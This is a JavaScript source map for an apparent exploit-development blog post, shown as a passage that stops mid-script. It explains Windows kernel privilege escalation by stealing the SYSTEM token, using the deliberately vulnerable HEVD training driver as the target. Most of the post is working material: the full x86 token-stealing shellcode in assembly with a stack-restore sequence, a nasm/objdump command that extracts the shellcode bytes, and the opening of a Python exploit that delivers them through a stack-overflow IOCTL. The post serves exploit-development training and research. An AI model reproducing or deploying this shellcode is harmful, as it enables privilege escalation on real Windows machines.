{
  "version": 3,
  "sources": ["ssg:https://framerusercontent.com/modules/xkgOTPH3D819XQA1Lv94/JiQ9XamYsqUqkFHxQJvK/WJBZI1Ghk-25.js"],
  "sourcesContent": ["import{jsx as e,jsxs as t}from\"react/jsx-runtime\";import{ComponentPresetsConsumer as n,Link as r}from\"framer\";import{motion as o}from\"framer-motion\";import*as i from\"react\";import s from\"https://framerusercontent.com/modules/pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js\";export const richText=/*#__PURE__*/t(i.Fragment,{children:[/*#__PURE__*/e(\"h2\",{children:\"Security token stealing\"}),/*#__PURE__*/t(\"p\",{children:[\"When we are attacking the kernel, we are supposed to have unprivileged access to the target machine. That\u2019s why the common exploit goal is to perform Local Privilege Escalation which means to get full privileges on the OS. There are \",/*#__PURE__*/e(r,{href:\"https://securityintelligence.com/identifying-named-pipe-impersonation-and-other-malicious-privilege-escalation-techniques/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"several methods\"})}),\" that can be used to do that. Most of them (ab)use the privilege model implemented by Windows.\"]}),/*#__PURE__*/t(\"p\",{children:[\"In Windows, when the system starts, a process called \",/*#__PURE__*/e(\"code\",{children:\"System\"}),\" is created, always with \",/*#__PURE__*/e(\"code\",{children:\"PID\"}),\" 4. 
As this process is owned by the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" user, we will use this as the target process to steal the ticket from.\"]}),/*#__PURE__*/e(\"img\",{alt:\"NT Kernel & System\",className:\"framer-image\",height:\"403\",src:\"https://framerusercontent.com/images/KMkE322VX7vmFWkh10D0uPkNKhc.png\",srcSet:\"https://framerusercontent.com/images/KMkE322VX7vmFWkh10D0uPkNKhc.png?scale-down-to=512 512w,https://framerusercontent.com/images/KMkE322VX7vmFWkh10D0uPkNKhc.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/KMkE322VX7vmFWkh10D0uPkNKhc.png 1920w\",style:{aspectRatio:\"1920 / 806\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Each process has a \",/*#__PURE__*/e(\"code\",{children:\"EPROCESS\"}),\" structure.\"]}),/*#__PURE__*/e(\"img\",{alt:\"EPROCESS structure\",className:\"framer-image\",height:\"463\",src:\"https://framerusercontent.com/images/W6BIGD2vdQMoLyaBZH06uTOuujs.png\",srcSet:\"https://framerusercontent.com/images/W6BIGD2vdQMoLyaBZH06uTOuujs.png?scale-down-to=512 512w,https://framerusercontent.com/images/W6BIGD2vdQMoLyaBZH06uTOuujs.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/W6BIGD2vdQMoLyaBZH06uTOuujs.png 1920w\",style:{aspectRatio:\"1920 / 926\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"One of the members of that structure is \",/*#__PURE__*/e(\"code\",{children:\"Token\"}),\" which is a ticket granted by the \",/*#__PURE__*/e(\"code\",{children:\"LSASS\"}),\" process.\"]}),/*#__PURE__*/e(\"img\",{alt:\"Token LSASS\",className:\"framer-image\",height:\"205\",src:\"https://framerusercontent.com/images/7c19RFBdwkTgBKw51aljDk9M4TI.png\",srcSet:\"https://framerusercontent.com/images/7c19RFBdwkTgBKw51aljDk9M4TI.png?scale-down-to=512 512w,https://framerusercontent.com/images/7c19RFBdwkTgBKw51aljDk9M4TI.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/7c19RFBdwkTgBKw51aljDk9M4TI.png 1920w\",style:{aspectRatio:\"1920 / 
410\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"The token is used to perform operations on the system based on the permissions granted to it. For example, if a process wants to read a file, that file security descriptor will check if the token of process has the permissions to do it. This is what is known as Discretionary Access Control List or \",/*#__PURE__*/e(\"code\",{children:\"DACL\"}),\".\"]}),/*#__PURE__*/t(\"p\",{children:[\"In Windows, the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" token has all the permissions granted on all the system objects (files, processes, devices, pipes, etc). That\u2019s why, if we are able to steal that token and insert it to a non-privileged process, that process will gain \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" privileges.\"]}),/*#__PURE__*/t(\"p\",{children:[\"To do that, we first need to get the offset of the \",/*#__PURE__*/e(\"code\",{children:\"Token\"}),\" field in the \",/*#__PURE__*/e(\"code\",{children:\"EPROCESS\"}),\" structure:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Get the offset of EPROCESS\",className:\"framer-image\",height:\"88\",src:\"https://framerusercontent.com/images/baf2zLbLsm4qkOzwPmzoks564QU.png\",srcSet:\"https://framerusercontent.com/images/baf2zLbLsm4qkOzwPmzoks564QU.png?scale-down-to=512 512w,https://framerusercontent.com/images/baf2zLbLsm4qkOzwPmzoks564QU.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/baf2zLbLsm4qkOzwPmzoks564QU.png 1920w\",style:{aspectRatio:\"1920 / 176\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"As you see, it is at \",/*#__PURE__*/e(\"code\",{children:\"_EPROCESS+0x0fc\"}),\". 
With that, we need to get the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" process descriptor:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Get SYSTEM process descriptor\",className:\"framer-image\",height:\"118\",src:\"https://framerusercontent.com/images/2YA5adXpnPrYHmmZAmIcuKzxhUY.png\",srcSet:\"https://framerusercontent.com/images/2YA5adXpnPrYHmmZAmIcuKzxhUY.png?scale-down-to=512 512w,https://framerusercontent.com/images/2YA5adXpnPrYHmmZAmIcuKzxhUY.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/2YA5adXpnPrYHmmZAmIcuKzxhUY.png 1916w\",style:{aspectRatio:\"1916 / 236\"},width:\"958\"}),/*#__PURE__*/t(\"p\",{children:[\"Then, we need to get the value of the token for the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" process:\"]}),/*#__PURE__*/e(\"img\",{alt:\"SYSTEM process token\",className:\"framer-image\",height:\"64\",src:\"https://framerusercontent.com/images/4PHXm36N6N2bNjZZUyyYe4pnKU.png\",srcSet:\"https://framerusercontent.com/images/4PHXm36N6N2bNjZZUyyYe4pnKU.png?scale-down-to=512 512w,https://framerusercontent.com/images/4PHXm36N6N2bNjZZUyyYe4pnKU.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/4PHXm36N6N2bNjZZUyyYe4pnKU.png 1920w\",style:{aspectRatio:\"1920 / 128\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Now, we launch a \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\" process on the target OS and get the current privileges:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Obtaining privileges\",className:\"framer-image\",height:\"269\",src:\"https://framerusercontent.com/images/CF8fmUafZgVnWpsH5yLTmXOpwV4.png\",srcSet:\"https://framerusercontent.com/images/CF8fmUafZgVnWpsH5yLTmXOpwV4.png?scale-down-to=512 512w,https://framerusercontent.com/images/CF8fmUafZgVnWpsH5yLTmXOpwV4.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/CF8fmUafZgVnWpsH5yLTmXOpwV4.png 1920w\",style:{aspectRatio:\"1920 / 538\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"We must get the 
\",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\" process descriptor:\"]}),/*#__PURE__*/e(\"img\",{alt:\"cmd process descriptor\",className:\"framer-image\",height:\"107\",src:\"https://framerusercontent.com/images/IYhDsUZCNazzMcxbl6KE7KyNEY.png\",srcSet:\"https://framerusercontent.com/images/IYhDsUZCNazzMcxbl6KE7KyNEY.png?scale-down-to=512 512w,https://framerusercontent.com/images/IYhDsUZCNazzMcxbl6KE7KyNEY.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/IYhDsUZCNazzMcxbl6KE7KyNEY.png 1920w\",style:{aspectRatio:\"1920 / 214\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"Finally, we must copy the value of the token of the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" process to the \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\" process. Let\u2019s see it in action:\"]}),/*#__PURE__*/e(\"img\",{alt:\"Copying token to cmd\",className:\"framer-image\",height:\"656\",src:\"https://framerusercontent.com/images/Tm9PEnPptRUVnmMLg3vWbieQk.gif\",srcSet:\"https://framerusercontent.com/images/Tm9PEnPptRUVnmMLg3vWbieQk.gif?scale-down-to=1024 906w,https://framerusercontent.com/images/Tm9PEnPptRUVnmMLg3vWbieQk.gif 1162w\",style:{aspectRatio:\"1162 / 1312\"},width:\"581\"}),/*#__PURE__*/t(\"p\",{children:[\"Wonderful! 
As you can see, our \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\" is now running as \",/*#__PURE__*/e(\"code\",{children:\"nt authority\\\\system\"}),\"!\"]}),/*#__PURE__*/t(\"p\",{children:[\"_____\",/*#__PURE__*/e(\"br\",{}),/*#__PURE__*/e(\"br\",{}),\"\u26A0\uFE0F \",/*#__PURE__*/e(\"strong\",{children:\" \"}),/*#__PURE__*/t(\"em\",{children:[/*#__PURE__*/e(\"strong\",{children:\"Note: \"}),\"We need to remember that the offsets described in this article are only applicable for the Windows version that we are currently using: Windows 10 1703 32 bits.\",/*#__PURE__*/t(\"strong\",{children:[/*#__PURE__*/e(\"br\",{}),/*#__PURE__*/e(\"br\",{})]})]}),\"_____\"]}),/*#__PURE__*/e(\"p\",{children:\"Now, we must make this process programmatically if we want to include it in our exploit. The strategy is the following:\"}),/*#__PURE__*/t(\"ul\",{children:[/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Look for a fixed starting point that we can use to calculate offsets, using position-independent code.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Get the current process list.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Find the \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\" process.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Find the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" process (with \",/*#__PURE__*/e(\"code\",{children:\"PID\"}),\" 4).\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Grab the \",/*#__PURE__*/e(\"code\",{children:\"Token\"}),\" from the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" process.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[\"Copy the token from process \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" 
to the \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\" process.\"]})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Restore execution.\"})}),/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/e(\"p\",{children:\"Enjoy.\"})})]}),/*#__PURE__*/t(\"p\",{children:[\"The first step is to find a fixed position from where we can get the required structures as an offset. According to \",/*#__PURE__*/e(r,{href:\"https://en.wikipedia.org/wiki/Win32_Thread_Information_Block\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!0,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"this entry\"})}),\", we can access the \",/*#__PURE__*/e(\"code\",{children:\"_NT_TIB\"}),\" structure from the \",/*#__PURE__*/e(\"code\",{children:\"fs\"}),\" segment selector. This structure holds information of the current running thread (in our case, that would be the exploit). The article also says that we can reach the \",/*#__PURE__*/e(\"code\",{children:\"_KTHREAD\"}),\" structure at \",/*#__PURE__*/e(\"code\",{children:\"fs+0x124\"}),\". 
With that, we can start writing some assembler:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"pushad                                  ; Save current registers\\nmov eax, dword fs:[0x124]               ; EAX now points to _KTHREAD\",language:\"Markdown\"})})}),/*#__PURE__*/t(\"p\",{children:[\"In the \",/*#__PURE__*/e(\"code\",{children:\"_KTHREAD\"}),\" structure we can find an offset to the \",/*#__PURE__*/e(\"code\",{children:\"_KPROCESS\"}),\".\"]}),/*#__PURE__*/e(\"img\",{alt:\"_KTHREAD Process\",className:\"framer-image\",height:\"93\",src:\"https://framerusercontent.com/images/fr8u8SlCphNUK2D4KpgXqphDBSM.png\",srcSet:\"https://framerusercontent.com/images/fr8u8SlCphNUK2D4KpgXqphDBSM.png?scale-down-to=512 512w,https://framerusercontent.com/images/fr8u8SlCphNUK2D4KpgXqphDBSM.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/fr8u8SlCphNUK2D4KpgXqphDBSM.png 1920w\",style:{aspectRatio:\"1920 / 186\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"It turns out that \",/*#__PURE__*/e(\"code\",{children:\"_KPROCESS\"}),\" is the first field of \",/*#__PURE__*/e(\"code\",{children:\"_EPROCESS\"}),\", which means that we can access the \",/*#__PURE__*/e(\"code\",{children:\"_EPROCESS\"}),\" structure at \",/*#__PURE__*/e(\"code\",{children:\"_KTHREAD+0x150\"}),\":\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"pushad                                  ; Save current registers\\nmov eax, dword fs:[0x124]               ; EAX now points to _KTHREAD\\nmov eax, dword [eax+0x150]              ; EAX now points to 
_EPROCESS\",language:\"Markdown\"})})}),/*#__PURE__*/t(\"p\",{children:[\"The \",/*#__PURE__*/e(\"code\",{children:\"_EPROCESS\"}),\" structure holds the required offsets to the other needed information:\"]}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"_EPROCESS+0x0b8\"}),\" points to \",/*#__PURE__*/e(\"code\",{children:\"ActiveProcessLinks\"}),\" which is a linked list holding the current running processes, and \",/*#__PURE__*/e(\"code\",{children:\"_EPROCESS+0x0b4\"}),\" points to the current process \",/*#__PURE__*/e(\"code\",{children:\"PID\"}),\":\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"Current PID\",className:\"framer-image\",height:\"103\",src:\"https://framerusercontent.com/images/YZrEIYrTPZD2ldm85ItPKl3Vuw.png\",srcSet:\"https://framerusercontent.com/images/YZrEIYrTPZD2ldm85ItPKl3Vuw.png?scale-down-to=512 512w,https://framerusercontent.com/images/YZrEIYrTPZD2ldm85ItPKl3Vuw.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/YZrEIYrTPZD2ldm85ItPKl3Vuw.png 1920w\",style:{aspectRatio:\"1920 / 206\"},width:\"960\"}),/*#__PURE__*/e(\"ul\",{children:/*#__PURE__*/e(\"li\",{\"data-preset-tag\":\"p\",children:/*#__PURE__*/t(\"p\",{children:[/*#__PURE__*/e(\"code\",{children:\"_EPROCESS+0x140\"}),\" points to \",/*#__PURE__*/e(\"code\",{children:\"InheritedFromUniqueProcessId\"}),\" which will contain the \",/*#__PURE__*/e(\"code\",{children:\"PID\"}),\" of the parent process, in our case the \",/*#__PURE__*/e(\"code\",{children:\"PID\"}),\" of \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\":\"]})})}),/*#__PURE__*/e(\"img\",{alt:\"Parent Process PID\",className:\"framer-image\",height:\"88\",src:\"https://framerusercontent.com/images/km3DvrGFR7E7rDCCWgn2aYnKr4.png\",srcSet:\"https://framerusercontent.com/images/km3DvrGFR7E7rDCCWgn2aYnKr4.png?scale-down-to=512 
512w,https://framerusercontent.com/images/km3DvrGFR7E7rDCCWgn2aYnKr4.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/km3DvrGFR7E7rDCCWgn2aYnKr4.png 1920w\",style:{aspectRatio:\"1920 / 176\"},width:\"960\"}),/*#__PURE__*/t(\"p\",{children:[\"With that, we need to save the \",/*#__PURE__*/e(\"code\",{children:\"PID\"}),\" of \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\":\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"pushad                                  ; Save current registers\\nmov eax, dword fs:[0x124]               ; EAX now points to _KTHREAD\\nmov eax, dword [eax+0x150]              ; EAX now points to _EPROCESS\\nmov edx, dword [eax+0x140]              ; EDX now points to cmd.exe PID\",language:\"Markdown\"})})}),/*#__PURE__*/t(\"p\",{children:[\"Now we need to traverse the \",/*#__PURE__*/e(\"code\",{children:\"ActiveProcessLinks\"}),\" list to find the \",/*#__PURE__*/e(\"code\",{children:\"_EPROCESS\"}),\" structure for the \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\" process:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"pushad                                  ; Save current registers\\nmov eax, dword [fs:0x124]               ; EAX now points to _KTHREAD\\nmov eax, dword [eax+0x150]              ; EAX now points to _EPROCESS\\nmov edx, dword [eax+0x140]              ; EDX now points to cmd.exe PID\\nmov ecx, eax                            ; ECX will be used to iterate over ActiveProcessLinks\\nfind_cmd:\\nmov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks\\n            
                            ; of current process\\nsub ecx, 0x0b8                          ; Point to current _EPROCESS\\ncmp dword [ecx+0x0b4], edx              ; Check if this entry belongs to `cmd.exe`\\njne find_cmd                            ; If not, go to the next entry of ActiveProcessLinks\",language:\"Markdown\"})})}),/*#__PURE__*/t(\"p\",{children:[\"Then, find the \",/*#__PURE__*/e(\"code\",{children:\"_EPROCESS\"}),\" structure for the \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" process:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"pushad                                  ; Save current registers\\nmov eax, dword [fs:0x124]               ; EAX now points to _KTHREAD\\nmov eax, dword [eax+0x150]              ; EAX now points to _EPROCESS\\nmov edx, dword [eax+0x140]              ; EDX now points to cmd.exe PID\\nmov ecx, eax                            ; ECX will be used to iterate over ActiveProcessLinks\\nfind_cmd:\\nmov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks\\n                                        ; of current process\\nsub ecx, 0x0b8                          ; Point to current _EPROCESS\\ncmp dword [ecx+0x0b4], edx              ; Check if this entry belongs to `cmd.exe`\\njne find_cmd                            ; If not, go to the next entry of ActiveProcessLinks\\nmov edi, ecx                            ; EDI now points to cmd.exe _EPROCESS\\nmov ecx, eax                            ; Rewind to iterate using ECX over ActiveProcessLinks\\nfind_system:\\nmov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks\\n                                        ; of current process\\nsub ecx, 0x0b8                          ; Point to current _EPROCESS\\ncmp dword [ecx+0x0b4], 4            
    ; Check if this entry belongs to PID 4 = SYSTEM\\njne find_system                         ; If not, go to the next entry of ActiveProcessLinks\",language:\"Markdown\"})})}),/*#__PURE__*/t(\"p\",{children:[\"We then must move the token from \",/*#__PURE__*/e(\"code\",{children:\"SYSTEM\"}),\" to \",/*#__PURE__*/e(\"code\",{children:\"cmd.exe\"}),\":\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"pushad                                  ; Save current registers\\nmov eax, dword [fs:0x124]               ; EAX now points to _KTHREAD\\nmov eax, dword [eax+0x150]              ; EAX now points to _EPROCESS\\nmov edx, dword [eax+0x140]              ; EDX now points to cmd.exe PID\\nmov ecx, eax                            ; ECX will be used to iterate over ActiveProcessLinks\\nfind_cmd:\\nmov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks\\n                                        ; of current process\\nsub ecx, 0x0b8                          ; Point to current _EPROCESS\\ncmp dword [ecx+0x0b4], edx              ; Check if this entry belongs to `cmd.exe`\\njne find_cmd                            ; If not, go to the next entry of ActiveProcessLinks\\nmov edi, ecx                            ; EDI now points to cmd.exe _EPROCESS\\nmov ecx, eax                            ; Rewind to iterate using ECX over ActiveProcessLinks\\nfind_system:\\nmov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks\\n                                        ; of current process\\nsub ecx, 0x0b8                          ; Point to current _EPROCESS\\ncmp dword [ecx+0x0b4], 4                ; Check if this entry belongs to PID 4 = SYSTEM\\njne find_system                         ; If not, go to the next entry of ActiveProcessLinks\\nadd ecx, 
0x0fc                          ; ECX now points to the Token of SYSTEM\\nmov ecx, [ecx]                          ; Copy contents of Token to ECX\\nmov [edi+0x0fc], ecx                    ; Move the Token of SYSTEM to cmd.exe\",language:\"Markdown\"})})}),/*#__PURE__*/t(\"p\",{children:[\"And finally restore execution. As we are writing in the stack, we had surely mangled immediate stack frames of caller functions. If we look at the stack after executing the shellcode, we can see that there is a stack frame at which we can return to, located at \",/*#__PURE__*/e(\"code\",{children:\"esp+0x10\"}),\":\"]}),/*#__PURE__*/e(\"img\",{alt:\"esp+0x10\",className:\"framer-image\",height:\"397\",src:\"https://framerusercontent.com/images/W1KlJ1M8cPGmJhTDSqcFUNAQo.png\",srcSet:\"https://framerusercontent.com/images/W1KlJ1M8cPGmJhTDSqcFUNAQo.png?scale-down-to=512 512w,https://framerusercontent.com/images/W1KlJ1M8cPGmJhTDSqcFUNAQo.png?scale-down-to=1024 1024w,https://framerusercontent.com/images/W1KlJ1M8cPGmJhTDSqcFUNAQo.png 1920w\",style:{aspectRatio:\"1920 / 794\"},width:\"960\"}),/*#__PURE__*/e(\"p\",{children:\"With that, we can add a restore point to our shellcode:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"pushad\\nmov eax, dword [fs:0x124]               ; EAX now points to _KTHREAD\\nmov eax, dword [eax+0x150]              ; EAX now points to _EPROCESS\\nmov edx, dword [eax+0x140]              ; EDX now points to cmd.exe PID\\nmov ecx, eax                            ; ECX will be used to iterate over ActiveProcessLinks\\nfind_cmd:\\nmov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks\\n                                        ; of current process\\nsub ecx, 0x0b8                          ; Point to current _EPROCESS\\ncmp dword 
[ecx+0x0b4], edx              ; Check if this entry belongs to `cmd.exe`\\njne find_cmd                            ; If not, go to the next entry of ActiveProcessLinks\\nmov edi, ecx                            ; EDI now points to cmd.exe _EPROCESS\\nmov ecx, eax                            ; Rewind to iterate using ECX over ActiveProcessLinks\\nfind_system:\\nmov ecx, dword [ecx+0x0b8]              ; ECX points to ActiveProcessLinks\\n                                        ; of current process\\nsub ecx, 0x0b8                          ; Point to current _EPROCESS\\ncmp dword [ecx+0x0b4], 4                ; Check if this entry belongs to PID 4 = SYSTEM\\njne find_system                         ; If not, go to the next entry of ActiveProcessLinks\\nadd ecx, 0x0fc                          ; ECX now points to the Token of SYSTEM\\nmov ecx, [ecx]                          ; Copy contents of Token to ECX\\nmov [edi+0x0fc], ecx                    ; Move the Token of SYSTEM to cmd.exe\\npopad                                   ; Restore\\nxor eax,eax\\ninc eax\\nadd esp,0x10\\npop ebp\\nret 8\",language:\"Markdown\"})})}),/*#__PURE__*/e(\"p\",{children:\"Now, we can compile that code with:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"> nasm -f elf32 -o steal.o steal.asm\",language:\"Markdown\"})})}),/*#__PURE__*/e(\"p\",{children:\"And get the shellcode with:\"}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"$ for i in $(objdump -d steal.o -M intel |grep \\\"^ \\\" |cut -f2); do echo -n '\\\\x'$i; done; 
echo\\n\\\\x60\\\\x64\\\\xa1\\\\x24\\\\x01\\\\x00\\\\x00\\\\x8b\\\\x80\\\\x50\\\\x01\\\\x00\\\\x00\\\\x8b\\\\x90\\\\x40\\\\x01\\\\x00\\\\x00\\n\\\\x89\\\\xc1\\\\x8b\\\\x89\\\\xb8\\\\x00\\\\x00\\\\x00\\\\x81\\\\xe9\\\\xb8\\\\x00\\\\x00\\\\x00\\\\x39\\\\x91\\\\xb4\\\\x00\\\\x00\\n\\\\x00\\\\x75\\\\xec\\\\x89\\\\xcf\\\\x89\\\\xc1\\\\x8b\\\\x89\\\\xb8\\\\x00\\\\x00\\\\x00\\\\x81\\\\xe9\\\\xb8\\\\x00\\\\x00\\\\x00\\n\\\\x83\\\\xb9\\\\xb4\\\\x00\\\\x00\\\\x00\\\\x04\\\\x75\\\\xeb\\\\x81\\\\xc1\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x8b\\\\x09\\\\x89\\\\x8f\\n\\\\xfc\\\\x00\\\\x00\\\\x00\\\\x61\\\\x31\\\\xc0\\\\x40\\\\x83\\\\xc4\\\\x10\\\\x5d\\\\xc2\\\\x08\\\\x00\",language:\"Markdown\"})})}),/*#__PURE__*/t(\"p\",{children:[\"Let\u2019s pick the exploit from the \",/*#__PURE__*/e(r,{href:\"https://fluidattacks.com/blog/hevd-smep-bypass/\",motionChild:!0,nodeId:\"WJBZI1Ghk\",openInNewTab:!1,preserveParams:!1,scopeId:\"contentManagement\",smoothScroll:!1,children:/*#__PURE__*/e(o.a,{children:\"last post\"})}),\", and update the shellcode. 
I also added some \",/*#__PURE__*/e(\"code\",{children:\"print\"}),\" calls that helps to trace at what stage of the exploit we are now:\"]}),/*#__PURE__*/e(\"div\",{className:\"framer-text-module\",style:{height:\"auto\",width:\"100%\"},children:/*#__PURE__*/e(n,{componentIdentifier:\"module:pVk4QsoHxASnVtUBp6jr/HTBsNkEMAb7TUGaO3DBy/CodeBlock.js:default\",children:t=>/*#__PURE__*/e(s,{...t,code:\"#!/usr/bin/env python3\\n\\\"\\\"\\\"\\nHackSysExtremeVulnerableDrive Stack Overflow.\\n\\nVulnerable Software: HackSysExtremeVulnerableDrive\\nVersion: 3.00\\nExploit Author: Andres Roldan\\nTested On: Windows 10 1703\\nWriteup: https://fluidattacks.com/blog/hevd-privilege-escalation/\\n\\\"\\\"\\\"\\n\\nimport struct\\nimport sys\\nfrom ctypes import windll, c_int, c_ulong, byref, sizeof\\nfrom infi.wioctl import DeviceIoControl\\n\\nKERNEL32 = windll.kernel32\\nPSAPI = windll.psapi\\nDEVICE_NAME = r'\\\\\\\\.\\\\HackSysExtremeVulnerableDriver'\\nIOCTL_HEVD_STACK_OVERFLOW = 0x222003\\n\\n\\ndef get_kernel_base():\\n    \\\"\\\"\\\"Obtain kernel base address.\\\"\\\"\\\"\\n    buff_size = 0x4\\n\\n    base = (c_ulong * buff_size)(0)\\n\\n    if not PSAPI.EnumDeviceDrivers(base, sizeof(base), byref(c_ulong())):\\n        print('Failed to get kernel base address.')\\n        sys.exit(1)\\n    return base[0]\\n\\n\\nBASE_ADDRESS = get_kernel_base()\\nprint(f'Obtained kernel base address: {hex(BASE_ADDRESS)}')\\n\\nSHELLCODE = (\\n    b'\\\\x60\\\\x64\\\\xa1\\\\x24\\\\x01\\\\x00\\\\x00\\\\x8b\\\\x80\\\\x50\\\\x01\\\\x00\\\\x00\\\\x8b\\\\x90\\\\x40\\\\x01'\\n    